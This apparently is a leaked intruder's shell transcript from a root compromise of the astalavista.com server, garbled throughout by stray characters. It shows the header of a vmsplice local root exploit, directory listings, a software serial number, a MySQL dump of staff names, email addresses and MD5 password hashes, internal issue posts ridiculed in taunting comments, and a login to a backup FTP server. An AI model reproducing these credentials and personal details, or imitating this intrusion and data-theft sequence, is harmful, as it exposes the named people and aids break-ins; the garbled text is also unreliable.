1 c8 P& `4 l: f5 c5 A2 l" e/ ~sh-3.2# ls -la4 u! o4 t& \) G5 h4 C
total 141208% Y- i# r1 J: V6 T
drwx–x–x 10 com com 4096 Apr 28 12:40 .8 K* Y6 h( w: ^( [" M5 n
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .." y9 l) _0 u+ K b
drwx—— 2 com com 4096 Jun 4 04:04 backups3 Y) i( V- Y/ J2 d
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql, |3 E6 Q- R9 v3 I( p
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
0 \. k( y/ `; p* e0 V! \-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
5 G2 n/ t/ N @ K' u0 ]3 U, t7 N-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout
; V' ]* X9 ?' g& K-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile0 f1 [4 y0 V' W# z, s, T
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
/ u4 e( g" T' kdrwx–x–x 3 com com 4096 Jan 29 2008 domains
" Z8 r+ G- |! R-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed$ Y r9 }' O- a+ e- ]6 [
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap
/ l9 Y1 a5 x( w- C2 R/ l-rw——- 1 com com 69 Nov 18 2008 .lesshst
0 [& y! ^6 x# z3 y. \, idrwx—— 2 com com 4096 Sep 24 2007 mail) {9 @& f2 I7 F i8 ~9 W# c' E7 C* `4 R- g
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
1 p2 j) M0 h% A* p/ w! P) a: Rdrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
% B! p- \2 V" [' olrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html5 d% F( o4 V9 B0 F; j4 d
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
& L' n8 I" N |6 e" Idrwx—— 2 com com 4096 Aug 26 2008 .ssh
9 S# C1 Z8 ]6 U% f* g% @0 K-rwx—— 1 com com 8515 Feb 10 2008 t- T( w) R+ e$ [1 a2 H$ E- x: L3 e
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
+ Q( _( b4 H8 V( zdrwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp6 } S# z3 t; y+ v$ x6 ~- a$ u
-rw-rw-r– 1 com com 617 May 20 2008 .toprc0 y, q( [, k( q: J
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql( o0 F* ?4 @5 N0 W! z- u- W7 {
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
: _+ P7 q) Y8 i: W* p3 O7 e# w-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
+ H% W' g, I" u1 g3 d$ D, i! ?5 i' @1 C2 F. Q& \! m' c0 u
sh-3.2# head t.c
) m. J0 ~; `: x/*! E% ~4 C* |0 s+ H q, E# H
* jessica_biel_naked_in_my_bed.c/ e$ l# n. G+ Z. e) j6 s8 y s4 c$ h
*
0 P: D$ O4 j, P# e' E2 B$ y* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.4 e; E p7 B' i; `: n' ~
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.9 r& Q* [2 B* |. W9 ~0 e, v, U
* Stejnak je to stare jak cyp a aj jakesyk rozbite.0 a! b& y9 {: j: Y( I
** g& G; c2 `. G0 Q k8 {
* Linux vmsplice Local Root Exploit
3 m5 ?9 D% T- z, h* By qaaz+ j n% R/ F) O: y5 V( D
*: c8 w4 H6 i6 R. P
& O& @8 d0 N; v' k: ]0 Ush-3.2# cd /
7 B3 v! I0 C1 Psh-3.2# ls -la2 e% W/ E( L' l& M! ?( L
total 3608 f" G9 W# J, ?4 c
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .5 l# I3 D+ ]; f* d
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ../ ~% Q4 l p. c# O% \9 D: c4 C. K' U
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
4 I/ |/ Q) ^0 \, k2 d-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
2 Y9 e9 ~# S- G) U# k-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
' }4 m$ Q6 y, ?8 b2 t. q% a* {-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
# P$ k' E0 G2 K6 r% R-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
9 C* y; s1 B: |/ qdrwxr-xr-x 3 root root 4096 Dec 29 2007 backup
$ s, F9 V9 [0 L5 Zdrwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
2 q. U$ W, s. n$ `drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot2 E1 {( K3 M4 i1 B/ I
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
2 T0 z( Y% S: L. D9 v% qdrwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
) ?" A: ~ ~, V: i; z4 b5 A+ o- pdrwxr-xr-x 14 root root 4096 Mar 11 17:56 home) `6 b/ H" s* m/ Y: E1 v) f
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf4 L/ m) J" F, x: d8 W! c* B* a
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib( T D0 L8 q1 S! t& P% w
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
6 D' z& s* ?, Zdrwx—— 2 root root 16384 Sep 11 2007 lost+found
( w. D4 d2 G" G( Ddrwxr-xr-x 2 root root 4096 Mar 11 17:56 media
1 `( p6 K0 S# f' ? fdrwxr-xr-x 2 root root 0 Jun 3 02:43 misc+ p3 n; ]: O) }( I2 x% c5 M1 K
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt- S% W$ V" ~6 w( t% j
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
7 B0 B( Y0 N4 A* [drwxr-xr-x 2 root root 0 Jun 3 02:43 net0 i) t1 r) p! J# h7 W
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
/ i4 m @8 _& C j" n$ @dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
1 c1 q7 O# b; r& }& i$ F0 n! _drwxr-x— 15 root root 4096 Jun 4 08:40 root8 A9 L: u! u( S
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin- A6 m$ Y0 p/ p6 { g# T5 j
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux5 ~% D1 y* w4 q! s( H
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
3 ?1 s6 p8 R" j. N) zdrwxr-xr-x 11 root root 0 Jun 3 02:42 sys, k* K. r# h! t1 q9 k: _. e/ \" q
drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp s: S! I% I6 N v7 x* O
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr& Y" g9 v! O; |4 ?9 r; e. T
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var+ ~8 P1 ~4 @+ z: |9 n
- `: t+ q) O Ssh-3.2# cd opt
) ]! x, J+ Z6 Fsh-3.2# ls -la- C9 ~6 q3 T" Y# ]
total 20
, g3 E. _2 h$ S% ydrwxr-xr-x 3 root root 4096 Mar 11 17:56 .
% N0 c8 }& V5 P$ adrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..8 I( O# q6 X# C& L- h
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
& {' c, Z8 b. A. c
* `) ?, N' r, a, bsh-3.2# cd lsws/3 q# L# }: b/ X- Y" b H1 C
sh-3.2# ls -la7 w7 ?7 w, D0 q4 P7 ~
total 108( Q5 w% h) Z, l" |
drwxr-xr-x 15 root root 4096 Mar 20 2008 .. L5 M3 J9 Y0 c2 p
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
! ]: ~- h) s; o7 o) g" S5 Vdrwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons' S( N6 N* G0 P
drwxr-xr-x 13 root root 4096 May 29 15:10 admin
# z4 E/ }& \/ X" q O' Q) ldrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
7 [/ R3 F5 r6 o* c7 vdrwxr-xr-x 2 root root 4096 May 29 15:10 bin* [3 R! T3 B, _6 e, V
drwx—— 4 apache apache 4096 Jun 3 02:43 conf, U; t8 ?6 d$ T! i
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT( x" B* \: P) z+ P8 u. j
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
; m8 L [9 W% X+ X( i( jdrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
" k y: m, w& ?0 N3 ?% y& \* Rdrwxr-xr-x 2 root root 4096 Sep 15 2008 lib9 v7 \- W: G, T* p
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
( H9 Z" X: c* d8 A! u8 S-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP% V, B. ^3 [: a
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL$ j. u3 P, ]8 Q# c; \' i% L
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP- F! o" Q; V( E* L, X- {) p1 ?1 N
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
' {9 Y& L: O5 U: Ndrwxr-xr-x 2 root root 4096 Mar 20 2008 php- N; H4 }- J( \
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild2 f2 F" n$ I/ v2 T8 o' B( i$ ]# ?) e
drwxr-xr-x 3 root root 4096 Mar 20 2008 share
- e# W' n) ~; U2 J! S-rw-r–r– 1 root root 6 May 29 15:10 VERSION
6 d: Y, e; D* M+ K; k' y# X! @' _. ?" P+ y" k* b7 m6 }
sh-3.2# cd conf
" I8 Z6 P' `9 Fsh-3.2# ls -la2 R; T7 g; v& S& I+ M: b( x2 F) i
total 48
) r, Y: r% T0 D; ~. T. Pdrwx—— 4 apache apache 4096 Jun 3 02:43 . j& Y4 q: a R# h; P b& z2 I7 G; k
drwxr-xr-x 15 root root 4096 Mar 20 2008 ..& t6 N z) g" e5 ]1 I) K
drwx—— 2 apache apache 4096 Mar 20 2008 cert
! n: T' P- f+ z( J# `7 h-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml/ M1 @+ b' d3 h) O/ a, T; T1 c
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak @. H+ ]) y7 S5 u* L. M a5 u1 @
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
3 Z2 t* f6 M: G) ]7 X-rw——- 1 apache apache 256 May 29 15:10 license.key
5 f: B9 @9 Q" h( s-rw——- 1 apache apache 256 Mar 21 2008 license.key.old# S8 i9 e0 F8 U7 @4 V1 `
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
. ?! q$ B1 s# z9 }-rw——- 1 apache apache 20 May 29 15:10 serial.no
0 S: ]+ |0 P$ mdrwx—— 2 apache apache 4096 Mar 20 2008 templates+ C) `$ Y/ j2 |8 I7 j; V7 o
2 V" n2 n b" e' y! s4 N. a U
sh-3.2# cat serial.no9 R/ P- b2 w0 W! \! ^
IbDl-oVsO-CKqL-wVRa+ E' G1 N, Q+ a* n6 ~5 h
7 ^* r6 I( c5 N! e! e& N c) u
sh-3.2# mysql
- d! t0 m1 O- B: F8 WWelcome to the MySQL monitor. Commands end with ; or \g.
+ x. P4 k' t* z0 y) k* O, V$ [Your MySQL connection id is 2868447 p m: ^& u9 T8 \* ~
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
/ K1 I+ e. A8 h9 G' z. Q
& `$ V& \# g4 M, v6 Y0 MType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.4 ]$ i* v0 G! f) `( [4 ^8 f( n3 F+ ~$ H
8 {9 A! R/ R' n( j$ p9 U
mysql> show databases;/ N" a; [1 ^2 [: m# W7 y6 x, C
+———————–+& l) j8 O% {% ]. I7 {6 u5 g9 U
| Database |/ H" V, R1 [: C8 J9 v' {
+———————–+
2 `) P( ^6 k0 h! ?3 w* U; w+ H! w| information_schema |5 s) O3 V5 h( T. `8 S0 f2 g
| astanet_ads |
: ]' }5 {7 X+ i% W# t8 |# L% K! b# I+ i| astanet_mailing_lists |
' I8 o3 A; Z p( O, @| astanet_mediawiki | g# P; m0 `; ]2 Y J# L7 c+ j. [
| astanet_membersystem |$ t) _; E5 I3 k/ i9 D' V
| com_contrexx |. Y) s" ^! r5 \( `
| com_contrexx2 |3 L& c! v. d* E- \- H& F
| com_contrexx2_live |3 F+ D/ t; e7 a: |1 Q* _
| da_roundcube |$ O0 a+ C0 c3 t1 f( X
| dolphin |& O$ x& @" x+ a N6 L/ s5 m% K% \ H1 G
| ideapool |
5 o, A/ P/ \5 C: n. k- X9 p| mysql |/ C; t' P3 C7 N3 `- k: ^1 x; @
| test |6 Y/ Y1 E8 ]8 X+ T3 U. q G. s
| yourmaster |
. L, q% L# ~+ ^& S* ~$ L/ R+———————–+
9 c }+ z! N& U, |6 A! x+ c' u5 D14 rows in set (0.00 sec)
) `1 a3 V% r5 ~& n6 l! h& I& K9 w9 K. \/ a7 ]1 I+ Z& Z
mysql> use ideapool
5 y% u7 j' X! J- rDatabase changed r6 V- B, B$ r1 U
mysql> show tables;
j7 j; O1 G# ^$ \# F. r7 q, |+———————————–+
M' n+ S$ g3 W" Z$ I| Tables_in_ideapool |5 A8 c; _, b3 ? ?- w* v9 M$ N
+———————————–+! Y+ I; ]; O4 [# X' x* e
| eventum_columns_to_display |& C: P5 W/ c4 W
| eventum_custom_field |, n; m& X3 W8 Z! _
| eventum_custom_field_option |
- F' ]# f, N1 s4 N| eventum_custom_filter |
$ i2 A% i- |; A ?| eventum_customer_account_manager |9 F' y1 @' A2 J
| eventum_customer_note |& U& S" K& }4 k! y6 `# _
| eventum_email_account |
8 i. y( z+ x1 _8 ]4 _( ?| eventum_email_draft |$ C) Q6 f7 q8 B. b7 N* n& Q# f% O
| eventum_email_draft_recipient |
+ A( Y/ c" }+ k3 p8 G+ M N- X| eventum_email_response |. ], k* r3 z9 ?( }
| eventum_faq |! {5 y9 j/ h) V; X5 O3 R2 k
| eventum_faq_support_level |6 O9 d y/ h! Z7 b$ h) m
| eventum_group |
3 O7 B/ c3 Z' d7 W+ { E| eventum_history_type |
( z+ M4 J0 D5 z' _| eventum_irc_notice |
6 P* h& y; T+ ]" a; f2 [| eventum_issue |: E! J; n/ R! x4 C l
| eventum_issue_association |
/ } |! }" c3 d7 J2 i2 @| eventum_issue_attachment |
1 D1 { i& j4 U- Q| eventum_issue_attachment_file |
! z% _2 X* G X3 t Z9 c" n# O7 E; i* g| eventum_issue_checkin |
: {: D! ]/ z* m D/ T+ ^| eventum_issue_custom_field |
% X: [( ?& z. e5 E" C2 q0 G| eventum_issue_history |9 @, t' v3 e3 _. s: e, h7 x; [
| eventum_issue_quarantine |
! O' |7 Z0 o C; q$ e| eventum_issue_requirement |
& w3 z; z- B; l. `0 P| eventum_issue_user |' Z; D# f; U* l0 ?2 C$ w
| eventum_issue_user_replier |
z3 m7 E; l1 k5 L' X| eventum_link_filter |
3 v8 K7 R7 \5 Z- C& T3 i2 w| eventum_mail_queue |7 E% ~3 e* A/ }+ y
| eventum_mail_queue_log |
1 k- F$ p) |; P9 ^| eventum_news |8 H6 m. v2 Q) ?# X' s( D5 z4 t4 I
| eventum_note |
5 [' x9 h! l7 x* d$ i% Y: H6 t. Y& }| eventum_phone_support |4 N2 l& K2 m& _9 d& Q. t' c9 b
| eventum_project |
+ ]) ]/ _# @0 |) J| eventum_project_category |: A3 W0 z f$ H7 D
| eventum_project_custom_field |0 z3 Y ?: j3 z+ C, c
| eventum_project_email_response |: h( Y/ u3 u! z+ ^) I) n7 {
| eventum_project_field_display |
* W: ^" c/ c$ l/ j| eventum_project_group |
X; U' s1 ]# [' C' n V# O( r| eventum_project_link_filter |! K" g! A9 ]8 c% x, A) z, n
| eventum_project_news |+ c J$ T+ ?8 X8 f
| eventum_project_phone_category |
* _. `: E7 C; k' x v| eventum_project_priority |
) D" z$ u, ~# [9 B| eventum_project_release |
6 q8 P8 Z2 k0 M| eventum_project_round_robin |, f7 s: |( j$ b
| eventum_project_status |
9 K, l5 V8 r1 p% W- X. \6 T| eventum_project_status_date |
* U! Y) I6 N- g8 a; ]* y| eventum_project_user |
9 J& Q; w5 a; x1 @2 X* }; p& s0 k| eventum_reminder_action |
7 ?5 S1 F1 E T V, ^6 f) f% ]| eventum_reminder_action_list |
t* N( \. S6 i| eventum_reminder_action_type |
/ ?) B% ?/ F/ M8 s| eventum_reminder_field |* P# U9 ~5 C3 C7 ], ^) L
| eventum_reminder_history |
0 E' X2 f- i. l! W7 ?. F" e3 X| eventum_reminder_level |
5 ]. O7 g) z- x0 H| eventum_reminder_level_condition |
1 J2 Y& ?) }; f Y8 ^/ r| eventum_reminder_operator |( I5 `" U$ H4 V' [
| eventum_reminder_priority |8 {* G. G* Z5 b/ c3 W+ K2 n
| eventum_reminder_requirement |% H" b( w' w/ F0 w
| eventum_reminder_triggered_action |; g+ k0 h9 G. j& I* D
| eventum_resolution |; W1 d4 _9 T7 M+ B2 S, j/ }* W
| eventum_round_robin_user |
3 }7 n& B3 q9 V| eventum_search_profile |3 i% O. A3 t) b1 [6 r( i8 l3 h5 |
| eventum_status |& l% ~, r% R# P) C2 x N1 ^
| eventum_subscription |" Q' v0 Y4 H* i( Y3 R
| eventum_subscription_type |2 v3 `: k8 K4 h, @; c$ |1 p
| eventum_support_email |8 A" \$ l) O7 p
| eventum_support_email_body |
" H$ Y) ~& p8 P% m k* [| eventum_time_tracking |
4 ]4 f( e5 t c! V4 J; u% h" y| eventum_time_tracking_category |
* W# A" Z* ?7 Z& p* f+ q9 z6 B| eventum_user |
m" y' w2 J8 a6 j. D0 f7 s+———————————–+
# y1 ]7 _$ J2 y; B8 r& a/ G. S! c69 rows in set (0.00 sec) u) N; x4 x* L# j: Q4 T" a
( X$ N* E5 o2 h& Wmysql> describe eventum_user;
8 B( f5 l! Q5 A5 H; X+————————-+——————+——+—–+———————+—————-+5 |! \, ^' @8 s0 t+ b2 H
| Field | Type | Null | Key | Default | Extra |
# ] O' S% k7 Y2 g+————————-+——————+——+—–+———————+—————-+: F- l& ~1 `% T" O& W! b% a
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |9 \% O0 }3 s8 j, |5 K
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
* w) ]! N8 h9 C8 ?) \| usr_customer_id | int(11) unsigned | YES | | NULL | |6 z6 _" {( k' B9 S- I4 Y
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |/ \* B' _0 ^" X$ y5 a
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
; ^4 s8 [1 H, @5 D- F' ^| usr_status | varchar(8) | NO | | active | |
& k, O+ u: R9 M' ^+ g1 U+ R| usr_password | varchar(32) | NO | | | |
C" n& u8 V) L# r7 S' Y. M| usr_full_name | varchar(255) | NO | | | |3 n% k0 i: {& U/ f: v9 b" s
| usr_email | varchar(255) | NO | UNI | | |- _1 F, D: z; d: m
| usr_preferences | longtext | YES | | NULL | |
0 [; p2 ^) j8 N, a# F| usr_sms_email | varchar(255) | YES | | NULL | | r. ^3 C. D) k* U" |9 W \
| usr_clocked_in | tinyint(1) | YES | | 0 | |
6 a1 N; h# n/ i- Q1 H2 [) j0 R X| usr_lang | varchar(5) | YES | | NULL | |
% {8 O" @" C% q9 M+————————-+——————+——+—–+———————+—————-+
& \5 W8 I9 v$ N13 rows in set (0.00 sec)* s( F7 r# j; X( N
, X$ j. o( s# l% ]) v! @* jmysql> select usr_full_name,usr_email,usr_password from eventum_user;
& B# K: G6 k0 Q( S" s+———————-+——————————-+———————————-+
4 E2 Z7 p" l4 J. J| usr_full_name | usr_email | usr_password |% |# G/ v% P0 B
+———————-+——————————-+———————————-+% Z2 d, W4 h- S( H0 y% i% W
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 | A# f6 t: A1 o( K
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
/ _1 F% _ r+ N- s) i4 r| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |/ Z& y: h3 ?% S+ L- `
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |" {5 Z2 [1 p/ O' [$ Q
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
! b6 Z9 X# x F7 z| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |7 F8 F" h- k/ M" s& Q& {
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
% T0 o, K- p H- `6 ]; _* f| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
) G5 h7 s' v( b: Y| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
' m( q+ x4 B) T/ R| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
& v9 \9 }- ?, E1 n5 t! o( I6 b3 V) s| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |7 v+ U/ D7 j( z
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e | w/ z2 U- F& v( V7 G1 i# ]/ }4 [
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
/ w, N0 W; x% Y* ^| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |6 }0 z/ W! n* ] F$ N5 X2 U) J
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |4 }. ^( [4 Q- D& o+ c# b" n
+———————-+——————————-+———————————-+
- `2 D2 Y8 D8 \9 K) r3 z, W15 rows in set (0.00 sec)+ S; S. b$ S7 _
" A. m& }* t* {3 h! G" Q" ymysql> select iss_description from eventum_issue where iss_id = 43;
3 V! d0 w. d2 j% K+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+& |! ^7 ^0 |) w5 S7 M8 r1 U! h
| iss_description
- R8 R+ }3 b5 v7 Z5 m2 A2 J) ]0 b|
) w- `$ Y2 d; n A% w+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+4 E8 o' ]) ^1 w0 E. n/ i/ f; D' o
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
A9 c) ?, i. Pconnected for 90 mins… 120mins… so what i propose is something like:" L9 ^" c* d, G( O* [5 [
链接标记[url]http://www.surfthechannel.com/[/url]+ C: b& h0 _1 v4 C2 g3 K
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
- R8 ]9 |& Y# R2 v. m% y; Ilike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
; w0 D: F, n8 q5 tbreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off! i- f" ?, P* l) ?, J
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
( C5 D3 {5 O1 @8 N. @
4 p4 F1 s# Q% H0 c% F, o0 ^We could also put advertisement during play on the flash video player itself… extra $$…" M6 w1 Q2 S# X( i+ P6 |8 X
2 ^0 v5 S. N' g1 v2 Q' c6 l/ H$ x- \
By sykadul |
5 ~+ J3 F# z7 c/ M% I" h+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
# S0 b# t8 S4 z+ u1 row in set (0.00 sec)
9 j. i e% z2 j5 g, Y+ p Z
) Z0 G" r2 x) U x, ]$ |8 R// Money and extra $$ is all they care about. remember that.
, k" d9 m1 v4 D$ H' i4 {/ a6 D5 w* x$ s% e) V% J% t: y+ D& p
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
. w: }) t9 f4 Q9 Q& D& ]3 {. z6 s: ^+————————+——————————————————————————————————————————————————————————————————————————————-+" ~6 h) a4 `0 t1 w# s5 D% a
| iss_summary | iss_description
% f* z3 ^5 N1 Q+ F8 j|% s- {1 _4 N, Y" I) d
+————————+——————————————————————————————————————————————————————————————————————————————-+7 g" g% ?4 a# M4 J% O0 e" L+ j5 G. P
| Forum for REAL EXPERTS | Hello,
& Z& Z3 D; \+ m" v
, A: g3 ~0 g1 Y7 ~5 a" U5 wIshtus and I,! f9 p+ d& Y6 d- f0 W
' e5 U, d$ {8 v' Q# {9 s
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide4 P# t4 O m( e, e% V
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..* X0 E- S( X, _# L
1 A2 N/ G+ \7 V5 N
One example a friend of mine from coresecurity.com!4 G* x) M$ E$ Z4 t1 f* |, I
$ L. Q- J4 M/ n# R5 F
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..: P, {( K& Y- Y+ a( ~9 w- i# V
* L8 F$ q( a( h2 x8 P% Z5 ?|6 n$ Y! S6 X' B; c0 [5 e
+————————+——————————————————————————————————————————————————————————————————————————————+2 v% K* S5 r: e" G0 g
1 row in set (0.00 sec)
9 s- y# G% H2 L6 h2 l" `( ~* ~! R$ a
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
" Y) x; o5 ]! {9 U# X' t/ e" l( a% T- u+ c: h j
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;6 T0 h9 M U* o/ _9 k2 y
+——————+———————————————————————————————+; _5 v K! ^& `8 H2 X* L
| iss_summary | iss_description |, i3 S# Y% u9 v: Q/ Y$ v
+——————+———————————————————————————————+
, B ] q& g+ || Website guidance | Virtual Girl which guides you trought the website.
% L! j' b# M! @0 M# X+ L
; @4 X9 h" J6 R5 q Q+ iWe need a girl with who you can ( talk )!!!
5 n! P3 `+ u' R( q2 XAlso for the News!
8 V6 L3 `- r( O. l" C& c3 ^4 LSo my suggestion is a girl who read you the news loud if you like!
+ \' {$ Q# X' B' ]: }$ c) uyou can choose between read yourselfe or she read it for you or both!1 D8 p- D! e9 r; y0 C+ \4 @8 u# W
) D; V3 ?% l; T4 K* C r, |1 fGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
0 d6 t) D ?$ s9 ]3 u. X4 @6 W" a$ _3 ^9 U; M% I2 J% W* f
Have a look on the example girls!!) o# S t% ~8 }5 ~
; N6 x: L7 E4 c9 x' W: c
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]9 V' v: S% x% _# M% \* m, }8 ]
5 c$ ^ X+ d2 T5 ~: Q d% @or that; ?# x3 x( j8 x
% u8 f5 o- ^4 Y0 ^链接标记[url]http://www.yellostrom.de/[/url]
, g5 \% V1 ~$ R1 y* B# X3 {2 ?/ X4 p' a& h! c
|$ {9 J- k1 \. G& E
+——————+———————————————————————————————+9 ?: l% U" D4 C3 e* i
1 row in set (0.00 sec)+ N* J- [5 B' m+ T' V) X2 n T
* p0 b8 Q8 S' U. A, J9 H0 h# _// ha ha.
% }* [% [2 g& W
( ]! \$ Y& g6 e; L" Tmysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;# `# X4 P& I6 V. j3 [
+————————–+———————————————————————————————————–+
# x& Y3 c7 S3 y. i6 g$ F0 c( X| iss_summary | iss_description |! {* o7 v, B7 g% G, h7 q* h
+————————–+———————————————————————————————————–+
0 O0 r: q/ j/ i* L( `, U| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
% r' Y ~+ D0 S' C+————————–+———————————————————————————————————–+
+ [4 ^# q9 I1 m, u" P1 row in set (0.00 sec)# E) t: u& o! {( A+ G4 V/ u" L
5 Q: Z8 p; o' F! Q P( T
// LOL.1 a G+ ]( E3 A$ x
, Z+ ~/ y* {, Y( F4 h8 Q: D8 y8 ~, X) h
mysql> exit
. x5 P) D g% g7 eBye5 q2 |: k/ M8 B5 S( W* O9 ]
& Q0 K- O' o0 B* Z; X! a% Nsh-3.2# ftp 212.254.194.163
+ ]( W) L" }7 ~; n; q8 j3 DConnected to 212.254.194.163.
& M3 w9 Y# L$ W6 ]1 C- V! b5 g4 c/ U220 BackupCOM_VW FTP server ready.
! |" d8 H/ ]" T' `- S504 AUTH: security mechanism ‘GSSAPI’ not supported.
- h; |5 ~# Z" ~- i0 a504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.1 J% |/ f# \ I; w5 v
KERBEROS_V4 rejected as an authentication type7 k2 T% Z( K& S
Name (212.254.194.163:root): astalavista.com( D: S2 U2 T' q: t% u7 Z5 g2 O4 S
331 Password required for astalavista.com.
! U$ S4 k5 ]# o" ]1 cPassword:
8 `, i1 E. A9 U* b' m8 [230 User astalavista.com logged in.
' y0 q/ Z+ m7 O+ lRemote system type is UNIX.
, w3 @7 [; _8 _! M' [Using binary mode to transfer files.
5 M# n, B1 r# f- K+ W6 qftp> ls -la
; z2 I, ]# L1 q) V227 Entering Passive Mode (212,254,194,163,2,188)
( G" C, d, @( }& k+ q' p/ I150 Opening BINARY mode data connection for ‘file list’.9 U9 v( N* y# f# `, L
dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com4 ~2 t k$ ^) ?( h# m* K
226 Transfer complete.
; a; V' K1 }( U+ Bftp> cd astalavista.com
